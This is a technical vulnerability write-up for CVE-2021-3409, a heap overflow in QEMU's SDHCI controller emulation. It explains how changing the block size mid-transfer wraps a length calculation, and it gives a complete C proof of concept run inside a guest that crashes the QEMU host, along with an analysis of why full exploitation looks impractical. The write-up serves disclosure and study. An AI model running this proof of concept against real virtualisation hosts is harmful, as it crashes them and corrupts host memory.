CVE: CVE-2021-3409

Tested Versions:

  • QEMU versions before 5.2.50

Product URL(s):

Description of the vulnerability

QEMU version 5.2.50 is susceptible to vulnerabilities which, when successfully exploited, could lead to the disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS).

SDHCI stands for Secure Digital Host Controller Interface. Secure Digital (SD) is a proprietary non-volatile memory card format developed by the SD Association (SDA) for portable devices. The SDHCI code in QEMU emulates an SD host controller based on the SD Host Controller Specification Ver2.0 published by the Technical Committee of the SD Association.

The image below shows the registers of the SDHCI device. We interact with the device by writing to these registers.

21-3409_Fig1

Figure 1 : SDHCI Registers

The vulnerable code resides in the SDHCI component of QEMU. The vulnerability is triggered when blksize (the block size, that is, the size of the block buffer) is changed in the middle of a data transfer or after an unfinished one. We can change blksize by writing to offset 0x4 of the register space. The code then miscalculates how much data to move at the block buffer's current offset, which is stored in the data_count variable. When the transfer to or from the block buffer continues, the length of the data is calculated as blksize - data_count, which is meant to be the amount needed to fill the block buffer. However, because blksize can be changed mid-transfer (for example to 0) while data_count is not cleared, the unsigned calculation blksize - data_count can wrap around. The result is a transfer with a very large size (in the range 0xfffffe01-0xffffffff), which overflows the heap-allocated block buffer in either direction.

The vulnerability resides in the sdhci_do_adma function, which processes data transfers between the SDHCI device and DMA buffers in guest system memory.
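The wraparound can be reproduced with plain unsigned arithmetic. The following is a minimal sketch, not QEMU code: the helper name dma_chunk_len is hypothetical, and it only mirrors the else branch of the transfer loop in sdhci_do_adma, assuming the subtraction is carried out in 32-bit unsigned arithmetic as the unsigned int begin variable suggests.

```c
#include <stdint.h>

/*
 * Hypothetical helper (not part of QEMU): models the length that the else
 * branch of the transfer loop hands to the DMA routine. data_count is set
 * to block_size and the chunk length is data_count - begin, computed in
 * unsigned arithmetic.
 */
static uint32_t dma_chunk_len(uint16_t block_size, uint32_t begin)
{
    uint32_t data_count = block_size;   /* s->data_count = block_size */
    return data_count - begin;          /* wraps when begin > block_size */
}
```

With a block size of 0x200 and begin equal to 0x10, the helper returns 0x1f0, the expected remainder of the block. Once the block size is zero, begin values from 0x1 to 0x1ff give lengths from 0xffffffff down to 0xfffffe01, which matches the range quoted above.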

/* Advanced DMA data transfer */
static void sdhci_do_adma(SDHCIState *s)
{
   unsigned int begin, length;
   const uint16_t block_size = s->blksize & BLOCK_SIZE_MASK;
   ADMADescr dscr = {};
   int i;
   ...
   for (i = 0; i < SDHC_ADMA_DESCS_PER_DELAY; ++i) {
       s->admaerr &= ~SDHC_ADMAERR_LENGTH_MISMATCH;

       get_adma_description(s, &dscr);
       ...
       length = dscr.length ? dscr.length : 64 * KiB;

       switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
       case SDHC_ADMA_ATTR_ACT_TRAN:  /* data transfer */
           if (s->trnmod & SDHC_TRNS_READ) {
               while (length) {
                   ...
                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size;
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin);
                   dscr.addr += s->data_count - begin;
                   ...
               }
           } else {
               ...
           }
           ...
       ...
       }
       ...
       /* ADMA transfer terminates if blkcnt == 0 or by END attribute */
       if (((s->trnmod & SDHC_TRNS_BLK_CNT_EN) &&
                   (s->blkcnt == 0)) || (dscr.attr & SDHC_ADMA_ATTR_END)) {
           ...
           sdhci_end_transfer(s);
           return;
       }

   }
   /* we have unfinished business - reschedule to continue ADMA */
   timer_mod(s->transfer_timer,
                  qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + SDHC_TRANSFER_DELAY);
} 

This function transfers data to or from DMA buffers based on the ADMA descriptor. The descriptor is fetched by get_adma_description and stored in the dscr variable.

static void get_adma_description(SDHCIState *s, ADMADescr *dscr)
{
   uint32_t adma1 = 0;
   uint64_t adma2 = 0;
   hwaddr entry_addr = (hwaddr)s->admasysaddr;
   switch (SDHC_DMA_TYPE(s->hostctl1)) {
   case SDHC_CTRL_ADMA2_32:
       dma_memory_read(s->dma_as, entry_addr, &adma2, sizeof(adma2));
       adma2 = le64_to_cpu(adma2);
       /* The spec does not specify endianness of descriptor table.
        * We currently assume that it is LE.
        */
       dscr->addr = (hwaddr)extract64(adma2, 32, 32) & ~0x3ull;
       dscr->length = (uint16_t)extract64(adma2, 16, 16);
       dscr->attr = (uint8_t)extract64(adma2, 0, 7);
       dscr->incr = 8;
       break;
   case SDHC_CTRL_ADMA1_32:
       dma_memory_read(s->dma_as, entry_addr, &adma1, sizeof(adma1));
       adma1 = le32_to_cpu(adma1);
       dscr->addr = (hwaddr)(adma1 & 0xFFFFF000);
       dscr->attr = (uint8_t)extract32(adma1, 0, 7);
       dscr->incr = 4;
       if ((dscr->attr & SDHC_ADMA_ATTR_ACT_MASK) == SDHC_ADMA_ATTR_SET_LEN) {
           dscr->length = (uint16_t)extract32(adma1, 12, 16);
       } else {
           dscr->length = 4 * KiB;
       }
       break;
   case SDHC_CTRL_ADMA2_64:
       dma_memory_read(s->dma_as, entry_addr, &dscr->attr, 1);
       dma_memory_read(s->dma_as, entry_addr + 2, &dscr->length, 2);
       dscr->length = le16_to_cpu(dscr->length);
       dma_memory_read(s->dma_as, entry_addr + 4, &dscr->addr, 8);
       dscr->addr = le64_to_cpu(dscr->addr);
       dscr->attr &= (uint8_t) ~0xC0;
       dscr->incr = 12;
       break;
   }
}

Several ADMA versions are handled here, and the one in use is selected by writing to the host control register. In this case, we can only use SDHC_CTRL_ADMA2_32 and SDHC_CTRL_ADMA1_32. The code for SDHC_CTRL_ADMA2_64 is present, but this QEMU device does not support setting the DMA type to SDHC_CTRL_ADMA2_64. We will revisit this later. In this writeup, we use ADMA2_32.

An ADMA descriptor specifies the physical memory address, the length, and the attributes of the operation we want to perform, such as a transfer between the device buffer and system memory. SDHCI reads the ADMA descriptor from physical memory at the address held in admasysaddr. We control this address by writing it to the ADMA System Address register at offset 0x58.

21-3409_Fig2

Figure 2 : ADMA Descriptor diagram
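The field layout used by the SDHC_CTRL_ADMA2_32 case of get_adma_description can be sketched as a small decoder. This is only an illustration: the struct, the helper name decode_adma2_32, and the ACT_* macros are hypothetical, and the action values in attr bits 4 and 5 are an assumption recalled from QEMU's internal header rather than something shown in this writeup.

```c
#include <stdint.h>

/* Fields of a 32-bit ADMA2 descriptor, as extracted in get_adma_description. */
struct adma2_desc {
    uint32_t addr;    /* bits 32..63, low two bits cleared */
    uint16_t length;  /* bits 16..31 */
    uint8_t  attr;    /* bits 0..6 */
};

/* Assumed action encoding in attr bits 4..5 (not shown in this writeup). */
#define ACT_MASK 0x30u
#define ACT_TRAN 0x20u   /* data transfer */
#define ACT_LINK 0x30u   /* link to another descriptor */

/* Hypothetical helper: decode one descriptor already converted to CPU order. */
static struct adma2_desc decode_adma2_32(uint64_t raw)
{
    struct adma2_desc d;
    d.addr   = (uint32_t)(raw >> 32) & ~0x3u;
    d.length = (uint16_t)(raw >> 16);
    d.attr   = (uint8_t)(raw & 0x7f);
    return d;
}
```

For example, the word 0x0000000000100029 decodes to attr 0x29, length 0x10 and address 0, and attr & ACT_MASK equals ACT_TRAN under the assumed encoding.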

Later, the ADMA descriptor is used as the information for the data transfer. For example, the code below transfers data from the device to system memory. The else block handles the opposite direction, from system memory to the device. A data transfer is selected by setting the descriptor's action bits to SDHC_ADMA_ATTR_ACT_TRAN, and the direction is chosen through the SDHC_TRNS_READ bit of the trnmod register.

       switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
       case SDHC_ADMA_ATTR_ACT_TRAN:  /* data transfer */
           if (s->trnmod & SDHC_TRNS_READ) {
               while (length) {
                   if (s->data_count == 0) {
                       sdbus_read_data(&s->sdbus, s->fifo_buffer, block_size); // fill the buffer from sd
                   }
                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin; // [1]
                       length = 0;
                    } else {
                       s->data_count = block_size;
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin); // [2]
                   dscr.addr += s->data_count - begin;
                   if (s->data_count == block_size) {
                       s->data_count = 0; // [3]
                       if (s->trnmod & SDHC_TRNS_BLK_CNT_EN) {
                           s->blkcnt--;
                           if (s->blkcnt == 0) {
                               break;
                           }
                       }
                   }
               }
           }
          else {
               ...
          }

The code above transfers data from the device to system memory via DMA. It loops while length is not zero and transfers block by block using dma_memory_write, copying from &s->fifo_buffer[begin] to the system memory address in dscr.addr with length s->data_count - begin. The loop finishes when s->blkcnt reaches zero or length reaches zero, but we can make the code ignore s->blkcnt by clearing the SDHC_TRNS_BLK_CNT_EN bit.

After this loop finishes, we can leave s->data_count nonzero by making the last iteration execute the code at [1], so that the reset at [3] is not executed.
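How data_count ends up nonzero can be checked with a small model of the loop. This is a sketch under stated assumptions, not QEMU code: model_descriptor is a hypothetical name, no DMA is performed, the block counter is ignored (as if SDHC_TRNS_BLK_CNT_EN were cleared), and inputs outside the range the loop was written for are rejected instead of modelled.

```c
#include <stdint.h>

/*
 * Hypothetical model of the read-side loop: tracks how data_count evolves
 * while one descriptor of the given length is consumed. Returns the final
 * data_count, or -1 when block_size is zero or data_count is not below it.
 */
static int model_descriptor(uint16_t block_size, uint32_t data_count,
                            uint32_t length)
{
    if (block_size == 0 || data_count >= block_size) {
        return -1;                       /* not modelled here */
    }
    while (length) {
        uint32_t begin = data_count;
        if (length + begin < block_size) {
            data_count = length + begin; /* [1]: partial block */
            length = 0;
        } else {
            data_count = block_size;
            length -= block_size - begin;
        }
        if (data_count == block_size) {
            data_count = 0;              /* [3]: block complete */
        }
    }
    return (int)data_count;
}
```

With a block size of 0x200, a descriptor length of 0x200 leaves data_count at 0, while a length of 0x10 leaves it at 0x10, which is the state the rest of this writeup relies on.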

This code below will be executed after the data transfer loop.

       /* ADMA transfer terminates if blkcnt == 0 or by END attribute */
       if (((s->trnmod & SDHC_TRNS_BLK_CNT_EN) &&
                   (s->blkcnt == 0)) || (dscr.attr & SDHC_ADMA_ATTR_END))      
       {
           trace_sdhci_adma_transfer_completed();
           ...
           sdhci_end_transfer(s);
           return;
       }

   }

   /* we have unfinished business - reschedule to continue ADMA */
   timer_mod(s->transfer_timer,
                  qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + SDHC_TRANSFER_DELAY);

The if statement checks whether s->blkcnt is zero or the ADMA descriptor has the END attribute. Otherwise the transfer is unfinished and the function reschedules itself to continue the ADMA transfer, which simply executes sdhci_do_adma again later.

Later, we can change the block size register to zero and let sdhci_do_adma continue. The same code explained earlier is then executed again, and the vulnerable code below triggers the bug.

                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size; // [1]
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin); // [2]
                   dscr.addr += s->data_count - begin; 

Here, s->data_count comes from the previous unfinished transfer, so its value is not zero, and it is copied into the begin variable. The else block is then executed and assigns block_size to s->data_count at [1]. Next, dma_memory_write is called at [2] with length s->data_count - begin. Because s->data_count is now zero (taken from block_size) and begin is not zero, the unsigned subtraction wraps around and produces a very large transfer size. This gives us a heap out-of-bounds read that copies memory starting at fifo_buffer into system memory.

Conversely, we can perform a heap overflow write by steering execution to the code shown below.

} else {
               while (length) {
                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size;
                       length -= block_size - begin;
                   }
                   dma_memory_read(s->dma_as, dscr.addr,
                                   &s->fifo_buffer[begin],
                                   s->data_count - begin);
                   dscr.addr += s->data_count - begin;
                   if (s->data_count == block_size) {
                       sdbus_write_data(&s->sdbus, s->fifo_buffer, block_size);
                       s->data_count = 0;
                       if (s->trnmod & SDHC_TRNS_BLK_CNT_EN) {
                           s->blkcnt--;
                           if (s->blkcnt == 0) {
                               break;
                           }
                       }
                   }
               }
           }

This is similar to the earlier code, but it transfers data from system memory into fifo_buffer via DMA, which means we have a heap overflow write past fifo_buffer.

The general idea for exploiting a heap overflow is usually to overwrite interesting data on the heap, such as a data pointer or a function pointer to gain RCE, or another value that helps with further exploitation.

To trigger this bug, we need to direct execution to the sdhci_do_adma function, but first we need to set up several registers, such as the transfer mode, block size, and host control registers. We also need a way to communicate with the device. In this case, we communicate through the device's PCI memory region, which means writing our values to its physical memory address.

To find the address, use the lspci -v command in the guest OS. The lspci -v output contains an entry for the SD Host Controller, which shows a memory region at 0xfebf1000. The register at offset zero is therefore at 0xfebf1000, and the register at offset n is at 0xfebf1000+n.

./21-3409_Fig3

To interact with the device, we need to read and write physical memory at the 0xfebf1000 base address. In a Linux guest, we can map a physical address through /dev/mem using the mmap syscall. The code below shows how to mmap the device via /dev/mem.

#define SDHCI_ADDR 0xfebf1000
#define SDHCI_SIZE 256
unsigned char* sdhci_map = NULL;
int fd;
void* devmap( size_t offset, size_t size)
{
   void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_FILE|MAP_SHARED, fd, offset );
   if ( result == (void*)(-1) ) {
       perror( "mmap" );
   }
   return result;
}
int main( int argc, char **argv ) {
   fd = open( "/dev/mem", O_RDWR | O_SYNC );
   if ( fd == -1 ) {
       perror( "open /dev/mem" );
       return 0;
   }
   sdhci_map = devmap(SDHCI_ADDR, SDHCI_SIZE);
   printf("success %p\n", sdhci_map);
   ...
}

First, we open /dev/mem and store the file descriptor in the fd variable, which is then passed as the fifth parameter of mmap. The devmap function maps physical addresses via /dev/mem. To map the SDHCI registers at 0xfebf1000, we pass that address as the first parameter of devmap and 256 as the size, because the SDHCI register space is 256 bytes. After this, we simply read and write memory through the pointer stored in the sdhci_map variable to interact with the device.

To reach the vulnerable code, we need to set up several registers. Following the specification, I set the power control register to 0x3b and the host control register to 0xd7 to enable Advanced DMA. After that, we set the block size register and the transfer mode register. Here the transfer mode register is set to 0x21, which enables DMA. Note that the read-direction bit SDHC_TRNS_READ (0x10) is clear in this value, so the PoC moves data from system memory into the device buffer, which is consistent with the dma_memory_read call seen in the crash. Finally, following the specification, we write the command register to start the data transfer, which eventually calls sdhci_do_adma, where the vulnerability resides.
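One detail worth keeping in mind is that mmap requires its offset argument to be a multiple of the page size. The address 0xfebf1000 is already aligned for 4 KiB pages, but for an arbitrary physical address the split could be sketched as follows. The helper name split_phys_addr is hypothetical, and the page size is assumed to be a power of two such as the value returned by sysconf(_SC_PAGESIZE).

```c
#include <stdint.h>

/*
 * Hypothetical helper: split a physical address into the page-aligned base
 * that mmap() accepts as its offset and the remainder inside that page.
 * page_size must be a power of two.
 */
static void split_phys_addr(uint64_t phys, uint64_t page_size,
                            uint64_t *base, uint64_t *in_page)
{
    *base    = phys & ~(page_size - 1);
    *in_page = phys & (page_size - 1);
}
```

The mapping would then be requested at base, and the register pointer obtained by adding in_page to the address that mmap returns.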

static void
sdhci_write(void *opaque, hwaddr offset, uint64_t val, unsigned size)
{
   SDHCIState *s = (SDHCIState *)opaque;
   unsigned shift =  8 * (offset & 0x3);
   uint32_t mask = ~(((1ULL << (size * 8)) - 1) << shift);
   uint32_t value = val;
   value <<= shift;

   if (timer_pending(s->transfer_timer)) {
       sdhci_resume_pending_transfer(s);
   }

   switch (offset & ~0x3) {
   ...
   case SDHC_TRNMOD:
       /* DMA can be enabled only if it is supported as indicated by
        * capabilities register */
       if (!(s->capareg & R_SDHC_CAPAB_SDMA_MASK)) {
           value &= ~SDHC_TRNS_DMA;
       }
       MASKED_WRITE(s->trnmod, mask, value & SDHC_TRNMOD_MASK);
       MASKED_WRITE(s->cmdreg, mask >> 16, value >> 16);

       /* Writing to the upper byte of CMDREG triggers SD command generation */
       if ((mask & 0xFF000000) || !sdhci_can_issue_command(s)) {
           break;
       }

       sdhci_send_command(s);
       break;
     
}

The sdhci_write function handles every memory write to the SDHCI registers. Based on the code above, writing to the upper byte of the command register triggers sdhci_send_command.
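The shift and mask arithmetic in sdhci_write decides which bytes of the 32-bit register word a guest access covers. The sketch below reproduces only that arithmetic for access sizes of 1, 2 or 4 bytes. The helper names are hypothetical, the word offset 0x0c is taken from the register offsets used in this writeup, and the sdhci_can_issue_command condition is deliberately left out.

```c
#include <stdint.h>

/* Mask of the bits that the write leaves untouched, computed as in sdhci_write. */
static uint32_t sdhci_write_mask(uint64_t offset, unsigned size)
{
    unsigned shift = 8 * (offset & 0x3);
    return (uint32_t)~(((1ULL << (size * 8)) - 1) << shift);
}

/*
 * Nonzero when the write covers the upper byte of the 32-bit word at 0x0c,
 * which is the upper byte of the command register.
 */
static int touches_cmd_upper_byte(uint64_t offset, unsigned size)
{
    return (offset & ~0x3ULL) == 0x0c &&
           (sdhci_write_mask(offset, size) & 0xFF000000u) == 0;
}
```

A 2-byte write at offset 0x0e yields the mask 0x0000ffff and therefore reaches the command path, whereas a 1-byte write at offset 0x0c yields 0xffffff00 and only updates the transfer mode.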

static void sdhci_send_command(SDHCIState *s)
{
   SDRequest request;
   uint8_t response[16];
   int rlen;

   s->errintsts = 0;
   s->acmd12errsts = 0;
   request.cmd = s->cmdreg >> 8;
   request.arg = s->argument;
   sdhci_update_irq(s);
   ...
   if (s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
       s->data_count = 0;
       sdhci_data_transfer(s);
   }
}

As shown above, sdhci_send_command calls sdhci_data_transfer to perform the data transfer.

/* Perform data transfer according to controller configuration */

static void sdhci_data_transfer(void *opaque)
{
   SDHCIState *s = (SDHCIState *)opaque;

   if (s->trnmod & SDHC_TRNS_DMA) {
       switch (SDHC_DMA_TYPE(s->hostctl1)) {
       ...
       case SDHC_CTRL_ADMA2_32:
           if (!(s->capareg & R_SDHC_CAPAB_ADMA2_MASK)) {
               trace_sdhci_error("ADMA2 not supported");
               break;
           }
           sdhci_do_adma(s);
           break;
        ...
   }
   ...
}

By controlling the transfer mode and host control register, we can direct execution to sdhci_do_adma.

sdhci_do_adma transfers data between the device and system memory. We arrange for that transfer to remain unfinished, so the device will later call sdhci_data_transfer (which calls sdhci_do_adma again) to continue it. Before the transfer continues, we set the block size register to zero, which triggers the bug on the next pass through sdhci_do_adma.

Every read and write of the SDHCI registers is handled by sdhci_read and sdhci_write. These functions check whether there is an unfinished transfer and, if so, continue it by calling sdhci_resume_pending_transfer.

static void
sdhci_write(void *opaque, hwaddr offset, uint64_t val, unsigned size)
{
   SDHCIState *s = (SDHCIState *)opaque;
   unsigned shift =  8 * (offset & 0x3);
   uint32_t mask = ~(((1ULL << (size * 8)) - 1) << shift);
   uint32_t value = val;
   value <<= shift;

   if (timer_pending(s->transfer_timer)) {
       sdhci_resume_pending_transfer(s);
   }
   ...
} 

sdhci_resume_pending_transfer simply calls sdhci_data_transfer, which calls sdhci_do_adma again.

static void sdhci_resume_pending_transfer(SDHCIState *s)
{
   timer_del(s->transfer_timer);
   sdhci_data_transfer(s);
}

Before that, we need to place the ADMA descriptors in memory and store their address in the ADMA System Address register of the SDHCI device. To keep things simple, I write the ADMA descriptors at physical address 0 and then write the value 0 to the ADMA System Address register.

void writeb(unsigned char* mem, int idx, unsigned char val) {
   mem[idx] = val;
}

void writew(unsigned char* mem, int idx, unsigned short val) {
   *((unsigned short*)&mem[idx]) = val;
}

void writel(unsigned char* mem, int idx, unsigned int val) {
   *((unsigned int*)&mem[idx]) = val;
}

void writeq(unsigned char* mem, int idx, unsigned long val) {
   *((unsigned long*)&mem[idx]) = val;
}
int main( int argc, char **argv ) {
   fd = open( "/dev/mem", O_RDWR | O_SYNC );
   if ( fd == -1 ) {
       perror( "open /dev/mem" );
       return 0;
   }
   unsigned char* page = devmap(MEM_ADDR, MEM_SIZE);
   printf("success %p\n", page);
   memset(page, 0, 1024);
   writeb(page, 0x00, 0x29); // SDHC_ADMA_ATTR_ACT_TRAN
   writeb(page, 0x02, 0x10);
   writel(page, 0x04, MEM_ADDR); 
   writeb(page, 0x08, 0x39); // SDHC_ADMA_ATTR_ACT_LINK
   writel(page, 0xc, MEM_ADDR);
   ...
   writeq(sdhci_map, 0x58, MEM_ADDR); // system adma address
   ...
} 

Here, we create two ADMA descriptors. Each descriptor is 8 bytes and holds the attribute, the length, and a physical memory address that is either the buffer used for the data transfer or a pointer to another ADMA descriptor.

The first transfer uses the ADMA descriptor at address 0, which I set up with SDHC_ADMA_ATTR_ACT_TRAN, the attribute used for data transfers. After the first transfer, the ADMA system address register is incremented by 8 so that it points to the next ADMA descriptor. That descriptor has the SDHC_ADMA_ATTR_ACT_LINK attribute and address 0, so the ADMA system address is set back to 0. This keeps things simple: instead of creating many ADMA descriptors, we create descriptors that form a loop.

So, sdhci_do_adma is called three times. The first call only needs to leave a nonzero value in the data_count variable. The second call comes from sdhci_resume_pending_transfer, at the same time as we write zero to the block size register. The third call also comes from sdhci_resume_pending_transfer and performs a data transfer using the ADMA descriptor stored at address 0x00. Because data_count was left nonzero by the previous transfer and the block size is now zero, the bug is triggered.

/* Advanced DMA data transfer */

static void sdhci_do_adma(SDHCIState *s)
{
   unsigned int begin, length;
   const uint16_t block_size = s->blksize & BLOCK_SIZE_MASK;
   ADMADescr dscr = {};
   int i;
   ...
      switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
       case SDHC_ADMA_ATTR_ACT_TRAN:  /* data transfer */
           if (s->trnmod & SDHC_TRNS_READ) {

                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size; // [1]
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin); // [2]
                   dscr.addr += s->data_count - begin;
                   ...

/* Advanced DMA data transfer */

static void sdhci_do_adma(SDHCIState *s)
{
       switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
       case SDHC_ADMA_ATTR_ACT_TRAN:  /* data transfer */
           ...
           s->admasysaddr += dscr.incr;
           break;
       case SDHC_ADMA_ATTR_ACT_LINK:   /* link to next descriptor table */
           s->admasysaddr = dscr.addr;
           trace_sdhci_adma("link", s->admasysaddr);
           break;
         ...
         }
      ...
}

Below is the final code to trigger the bug. Running it in a Linux guest makes QEMU hit a segmentation fault and crash. Before running this code, we need to allow DMA transfers by enabling bus mastering for the SDHCI device with this command: sudo setpci -s 00:04.0 4.B=7. Here 00:04.0 is the PCI address of the device, and 4.B=7 writes 7 to the byte at offset 4 of its configuration space (the PCI command register), which sets the bus master bit.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdint.h>
#include <assert.h>

#define SDHCI_ADDR 0xfebf1000
#define SDHCI_SIZE 256
#define MEM_ADDR 0x00000000
#define MEM_SIZE (4096)

unsigned char* sdhci_map = NULL;
int fd;

void* devmap( size_t offset, size_t size)
{
   void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_FILE|MAP_SHARED, fd, offset );
   if ( result == (void*)(-1) ) {
       perror( "mmap" );
   }
   return result;
}

void writeb(unsigned char* mem, int idx, unsigned char val) {
   mem[idx] = val;
}

void writew(unsigned char* mem, int idx, unsigned short val) {
   *((unsigned short*)&mem[idx]) = val;
}

void writel(unsigned char* mem, int idx, unsigned int val) {
   *((unsigned int*)&mem[idx]) = val;
}

void writeq(unsigned char* mem, int idx, unsigned long val) {
   *((unsigned long*)&mem[idx]) = val;
}

int main( int argc, char **argv ) {
   fd = open( "/dev/mem", O_RDWR | O_SYNC );
   if ( fd == -1 ) {
       perror( "open /dev/mem" );
       return 0;
   }
   unsigned char* page = devmap(MEM_ADDR, MEM_SIZE);
   printf("success %p\n", page);
   memset(page, 0, 1024);
   writeb(page, 0x00, 0x29); // SDHC_ADMA_ATTR_ACT_TRAN
   writeb(page, 0x02, 0x10);
   writel(page, 0x04, MEM_ADDR);
   writeb(page, 0x08, 0x39); // SDHC_ADMA_ATTR_ACT_LINK
   writel(page, 0xc, MEM_ADDR);
   getchar();
   sdhci_map = devmap(SDHCI_ADDR, SDHCI_SIZE);
   printf("success %p\n", sdhci_map);
   writew(sdhci_map, 0x28, 0x3bd7); // power and host control
   writeb(sdhci_map, 0x05, 0x2c); // block size
   writeb(sdhci_map, 0x0c, 0x21); // transfer mode: DMA enable set, SDHC_TRNS_READ (0x10) clear
   writeq(sdhci_map, 0x58, MEM_ADDR); // system adma address

   writew(sdhci_map, 0x0e, 0x846e); // command
   writew(sdhci_map, 0x04, 0x0000); // block size
   writew(sdhci_map, 0x08, 0x0); // argument 0, write anything just need to resume the transfer.
   getchar();
   close( fd );
}
// sudo setpci -s 00:04.0 4.B=7 && gcc -o new new.c && sudo ./new

Figure 3 : PoC that triggers the bug
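The value 7 written with setpci before running the PoC can be read as a bit mask over the standard PCI command register. The macro and function names in this sketch are local to the example and are not taken from any particular header.

```c
#include <stdint.h>

/* Standard PCI command register bits (offset 0x04 of configuration space). */
#define PCI_CMD_IO_SPACE    0x1u  /* respond to I/O space accesses */
#define PCI_CMD_MEM_SPACE   0x2u  /* respond to memory space accesses */
#define PCI_CMD_BUS_MASTER  0x4u  /* device may initiate DMA */

/* Nonzero when the command value lets the device act as a bus master. */
static int pci_cmd_allows_dma(uint16_t command)
{
    return (command & PCI_CMD_BUS_MASTER) != 0;
}
```

The value 7 sets all three bits, so the device both decodes accesses to its register region and is allowed to perform the DMA reads and writes that the ADMA transfer depends on.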

21-3409_Fig4

Figure 4 : Crashing QEMU

21-3409_Fig5

Figure 5 : Stack trace QEMU when the crash happens

If we look at the stack trace, we see that the crash comes from sdhci_do_adma, and that len is passed to dma_memory_read with a very large value (0xffffff80).

We tried to exploit this vulnerability, but it turns out to be unlikely to be exploitable because we cannot fully control the overflow length.

If we could control the overflow length, out-of-bounds reads and writes would be straightforward. In this case, we cannot fully control it: the length passed to dma_memory_read/write is always in the range 0xfffffe01-0xffffffff, so every transfer must read or overwrite almost 4GB of memory.

static void sdhci_do_adma(SDHCIState *s)
{
   unsigned int begin, length;
   const uint16_t block_size = s->blksize & BLOCK_SIZE_MASK;
   ...
          length = dscr.length ? dscr.length : 64 * KiB;
          ...
               while (length) {
                   if (s->data_count == 0) {
                       sdbus_read_data(&s->sdbus, s->fifo_buffer, block_size);
                   }
                   begin = s->data_count;
                   if ((length + begin) < block_size) {
                       s->data_count = length + begin;
                       length = 0;
                    } else {
                       s->data_count = block_size;
                       length -= block_size - begin;
                   }
                   dma_memory_write(s->dma_as, dscr.addr,
                                    &s->fifo_buffer[begin],
                                    s->data_count - begin);
                   dscr.addr += s->data_count - begin;
                   if (s->data_count == block_size) {
                       s->data_count = 0;
                       if (s->trnmod & SDHC_TRNS_BLK_CNT_EN) {
                           s->blkcnt--;
                           if (s->blkcnt == 0) {
                               break;
                           }
                       }
                   }
               }
    ...
} 

The length variable holds a 16-bit value because it comes from the 16-bit dscr.length, although it is stored in an unsigned int. The device properly validates the block size register (in code not shown here), so the block_size variable is never bigger than 0x200, which in turn means the data_count variable never exceeds 0x200. So, this code has no other integer overflow that would let us control the length passed to dma_memory_read/write. We are left with the limitation that the length passed (the fourth parameter of dma_memory_write/read, not the length variable) is in the range 0xfffffe01-0xffffffff.

With this limitation, we would need to spray the heap so that it grows large enough for the transfer to complete without a segfault from accessing unmapped memory. We would then need a 4GB buffer in system memory to hold our payload: the buffer would first receive 4GB of data read from the QEMU heap to obtain an information leak, and after the leak we would write 4GB of data back to the heap. This 4GB buffer must be physically contiguous, because we talk to the device in terms of physical addresses through DMA reads and writes. This is almost impossible, because the way RAM is allocated makes it hard to obtain 4GB of physically contiguous memory from the kernel, even if we write a kernel driver to do it. On Linux, one way to do it is to reserve a memory region with a kernel boot parameter. Kernel boot parameters are text strings that the kernel interprets to change specific behaviours and to enable or disable certain features, but they only take effect after a reboot. A scenario in which the attacker must restart the machine to perform a VM escape is far from realistic.

Suppose we could allocate physically contiguous memory in the kernel because the guest has enough RAM. This is still impossible, because we only have 32-bit ADMA: we cannot place our buffer above the 4GB boundary, since the SDHCI device in this QEMU code does not support it. We cannot place a 4GB buffer below the 4GB boundary either, because that range contains many regions reserved for the kernel, the BIOS, or memory-mapped I/O, and overwriting them would make the guest OS unstable and crash it. The image below shows this information for Linux. We think other operating systems would be similar.

21-3409_Fig6

Figure 6 : dmesg output showing reserved memory below the 4GB address

The code below supports 64-bit ADMA, which is selected by setting the host control register.

static void get_adma_description(SDHCIState *s, ADMADescr *dscr)
{
   uint32_t adma1 = 0;
   uint64_t adma2 = 0;
   hwaddr entry_addr = (hwaddr)s->admasysaddr;
   switch (SDHC_DMA_TYPE(s->hostctl1)) {
   ...
   case SDHC_CTRL_ADMA2_64:
       dma_memory_read(s->dma_as, entry_addr, &dscr->attr, 1);
       dma_memory_read(s->dma_as, entry_addr + 2, &dscr->length, 2);
       dscr->length = le16_to_cpu(dscr->length);
       dma_memory_read(s->dma_as, entry_addr + 4, &dscr->addr, 8);
       dscr->addr = le64_to_cpu(dscr->addr);
       dscr->attr &= (uint8_t) ~0xC0;
       dscr->incr = 12;
       break;
   }
}

However, there is another check before 64-bit ADMA is performed: the sdhci_data_transfer function checks the capabilities register and calls sdhci_do_adma only if that check passes.

/* Perform data transfer according to controller configuration */
static void sdhci_data_transfer(void *opaque)
{
   SDHCIState *s = (SDHCIState *)opaque;

   if (s->trnmod & SDHC_TRNS_DMA) {
       switch (SDHC_DMA_TYPE(s->hostctl1)) {
       ...
       case SDHC_CTRL_ADMA2_64:
           if (!(s->capareg & R_SDHC_CAPAB_ADMA2_MASK) ||
